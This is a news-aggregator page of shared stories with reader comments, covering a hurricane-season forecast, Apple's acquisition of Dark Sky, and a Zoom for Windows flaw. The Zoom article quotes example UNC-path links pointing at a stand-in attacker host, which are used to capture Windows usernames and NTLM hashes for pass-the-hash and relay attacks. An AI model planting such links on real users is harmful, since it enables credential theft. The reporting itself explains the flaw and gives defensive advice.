Entrepreneur, Law & Policy Analyst helping clients w/ strategic planning, communications interoperability, Software Developer, Scotch Enthusiast.
3181 stories
·
12 followers

Forecasters predict a busy Atlantic hurricane season

1 Share
Hurricane Dorian's satellite appearance on a Sunday morning in 2019.

Enlarge / Hurricane Dorian's satellite appearance on a Sunday morning in 2019. (credit: NOAA)

Everything else has been canceled this year, so doesn't it seem fair that we should cancel the Atlantic hurricane season as well? Alas, life is rarely fair, and that seems especially so in the midst of a pandemic.

The most prominent seasonal hurricane forecaster said Thursday there are several signals in the oceans and atmosphere that point toward a busy summer and fall for the Atlantic Ocean, Caribbean Sea, and Gulf of Mexico.

According to the outlook from Phil Klotzbach, at Colorado State University, the best estimate for Atlantic hurricanes this year is eight (the average is 6.4), with a total of 16 named storms (12.1). "The probability of US major hurricane landfall is estimated to be about 130 percent of the long-period average," Klotzbach's report states.

Before going further, let's acknowledge this: predicting overall hurricane activity two months before the Atlantic hurricane season begins is not the most robust of sciences. There is always the potential for a serious flub. For example, in April 2017, Klotzbach predicted four hurricanes during what was expected to be a quiet year, with just two of them becoming powerful "major" hurricanes. It ended up becoming the costliest tropical season on record in the Atlantic, with the formation of 10 hurricanes and six major hurricanes, including the destructive storms Harvey, Irma, and Maria.

But the program now led by Klotzbach has been doing this for nearly four decades, and more typically they come within one or two hurricanes of actual activity.

Here's the official forecast from Colorado State.

Here's the official forecast from Colorado State. (credit: Colorado State University)

For 2020, Klotzbach sees several variables that indicate a busy year in the tropical Atlantic. A weak La Niña may form during the summer or early fall, which tends to increase overall activity. Moreover, the tropical Atlantic is warmer than normal, especially the Gulf of Mexico. These trends may well persist into the summer and fall and favorably influence the development of tropical systems. Various analog seasons with similar environmental conditions at this time of year also point toward a busier year.

Although the Atlantic season begins in just two months, the historically most active period does not come until about the middle of August, where activity ramps up through early October. Klotzbach will release his next forecast on June 4, when forecasters should have a better sense of whether La Niña will form.

Read Comments

Read the whole story
christophersw
1 hour ago
reply
Baltimore, MD
Share this story
Delete

A Message to Our Users from Zoom CEO

1 Share
Comments
Read the whole story
christophersw
5 hours ago
reply
Baltimore, MD
Share this story
Delete

Attackers can use Zoom to steal users’ Windows credentials with no warning

1 Share
Attackers can use Zoom to steal users’ Windows credentials with no warning

Enlarge (credit: Christopher Blizzard)

Users of Zoom for Windows beware: the widely used software has a vulnerability that allows attackers to steal your operating system credentials, researchers said.

Discovery of the currently unpatched vulnerability comes as Zoom usage has soared in the wake of the coronavirus pandemic. With massive numbers of people working from home, they rely on Zoom to connect with co-workers, customers, and partners. Many of these home users are connecting to sensitive work networks through temporary or improvised means that don’t have the benefit of enterprise-grade firewalls found on-premises.

Embed network location here

Attacks work by using the Zoom chat window to send targets a string of text that represents the network location on the Windows device they’re using. The Zoom app for Windows automatically converts these so-called universal naming convention strings—such as //attacker.example.com/C$—into clickable links. In the event that targets click on those links on networks that aren’t fully locked down, Zoom will send the Windows usernames and the corresponding NTLM hashes to the address contained in the link.

Attackers can then use the credentials to access shared network resources, such as Outlook servers and storage devices. Typically, resources on a Windows network will accept the NTLM hash when authenticating a device. That leaves the networks open to so-called pass-the-hash attacks that don’t require a cracking technique to convert the hash to its corresponding plain-text password.

“It’s quite a shortcoming from Zoom,” Matthew Hickey, cofounder of the security boutique Hacker House, told me. “It’s a very trivial bug. With more of us working from home now, it’s even easier to exploit that bug.”

The vulnerability was first described last week by a researcher who uses the Twitter handle @_g0dmode. He wrote: “#Zoom chat allows you to post links such as \\x.x.x.x\xyz to attempt to capture Net-NTLM hashes if clicked by other users.

On Tuesday, Hickey expanded on the discovery. He showed in one tweet how the Zoom Windows client exposed the credentials that could be used to access restricted parts of a Windows network.

“Hi @zoom_us & @NCSC,” Hickey wrote. “Here is an example of exploiting the Zoom Windows client using UNC path injection to expose credentials for use in SMBRelay attacks. The screen shot below shows an example UNC path link and the credentials being exposed (redacted).”

The screenshot shows the Windows username as Bluemoon/HackerFantastic. Immediately below, the NTLM hash appears, although Hickey redacted most of it in the image he posted.

Attacks can be mounted by people posing as a legitimate meeting participant or during so-called Zoom bombing raids, in which trolls access a meeting not secured by a password and bombard everyone else with offensive or harassing images.

Protect yourself

While the attack works only against Windows users, Hickey said attacks can be launched using any form of Zoom, again, by sending targets a UNC location in a text message. When Windows users click on the link while they’re connected to certain unsecured machines or networks, the Zoom app will send the credentials over port 445, which is used to transmit traffic related to Windows SMB and Active Directory services.

In the event that port 445 is closed to the Internet—either by a device or network firewall or through an ISP that blocks it—the attack won’t work. But it’s hardly a given that this egress will be closed on many Zoom users’ networks. The events of the past month have left millions of people working from home without the same levels of IT and security support they get when working on premises. That makes it more likely that port 445 is open, either because of an oversight or because the port is needed to connect to enterprise resources.

Zoom representatives didn’t respond to an email sent on Tuesday seeking comment for this post. This post will be updated if a reply comes later. In the meantime, Windows users should be highly suspicious of chat messages that contain links in them. When possible, users should also ensure that port 445 is either blocked or can access only trusted addresses on the Internet.

Read Comments

Read the whole story
christophersw
23 hours ago
reply
Baltimore, MD
Share this story
Delete

1.1.1.1 for Families

1 Comment
Comments
Read the whole story
christophersw
1 day ago
reply
Awesome!
Baltimore, MD
Share this story
Delete

Apple Acquires Dark Sky

2 Comments and 4 Shares

Adam Grossman on the Dark Sky blog:

Today we have some important and exciting news to share: Dark Sky has joined Apple.

Part of me wonders what took so long. Dark Sky is simply an outstanding app and service — I’ve been a devoted fan from the get-go in 2012 and have written about Dark Sky many times.

For now, the iOS app remains available (and is still sold for $4). The Android app and website will stop working on July 1. As for their API service:

Our API service for existing customers is not changing today, but we will no longer accept new signups. The API will continue to function through the end of 2021.

That’s a generous grace period. But to my knowledge there is no other service like Dark Sky’s, and it powers a lot of apps, including the excellent Carrot Weather and Weather Line apps. Dark Sky is also the weather provider for DuckDuckGo and Yelp.

I’m hoping that Apple has acquired Dark Sky not merely to beef up the built-in iPhone Weather app (Apple has no first-party Weather app for iPad or Mac, curiously), but to add hyperlocal weather forecasting APIs to its OSes. This would add a competitive advantage for iOS and MacOS both in terms of weather and privacy. Third-party weather apps are notorious for abusing location privileges.

Read the whole story
jhamill
1 day ago
reply
"That's a generous grace period." - FOR THE LARGEST COMPANY IN THE WORLD TO STOP SERVICING CUSTOMERS ON THE TWO LARGEST PLATFORMS IN THE WORLD. And those customers also include other companies, not just end users.

(no, I'm not mad about the decision to kill the Android and Web app of Dark Sky. Not at all.)
California
christophersw
1 day ago
reply
Baltimore, MD
Share this story
Delete
1 public comment
fxer
1 day ago
reply
Bummer, really been enjoying Carrot Weather which uses that api
Bend, Oregon
DMack
1 day ago
well the good news is the weather outside is irrelevant this year :P

Google cancels its infamous April Fools’ jokes this year

1 Comment
Comments
Read the whole story
christophersw
4 days ago
reply
I strongly disagree with this... This seems exactly the time we could use some escapist silly humor. Obviously you have to be sensitive to the situation - but I fail to see how Pacman Google maps, or the other classic Google April fools jokes wouldn't work in a pandemic.

Laughing together is something we need to do more of these days than ever!
Baltimore, MD
Share this story
Delete
Next Page of Stories